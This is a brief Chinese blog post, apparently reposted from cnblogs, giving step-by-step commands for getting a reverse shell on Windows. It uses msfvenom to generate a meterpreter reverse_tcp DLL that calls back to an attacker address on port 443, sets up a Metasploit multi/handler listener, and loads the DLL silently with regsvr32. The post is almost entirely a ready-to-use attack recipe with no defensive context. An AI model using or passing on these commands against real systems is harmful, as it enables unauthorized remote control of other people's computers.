码迷,mamicode.com
首页 > 系统相关 > 详细

加载dll文件反弹shell

时间:2020-02-16 16:13:17      阅读:132      评论:0      收藏:0      [点我收藏+]

标签:win   rev   bash   消失   handler   exploit   rundll32   exp   会话   

第一步:生成dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll

第二步:启动MSF等待回连

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.106.10
set LPORT 443
run

第三步:加载dll文件

# 建议加上 /s 和 /u 参数
regsvr32.exe /s /u reverse_tcp.dll

成功反弹shell后在进程列表中会出现rundll32.exe进程,如果退出meterpreter会话则进程消失。

加载dll文件反弹shell

标签:win   rev   bash   消失   handler   exploit   rundll32   exp   会话   

原文地址:https://www.cnblogs.com/dgjnszf/p/12317104.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!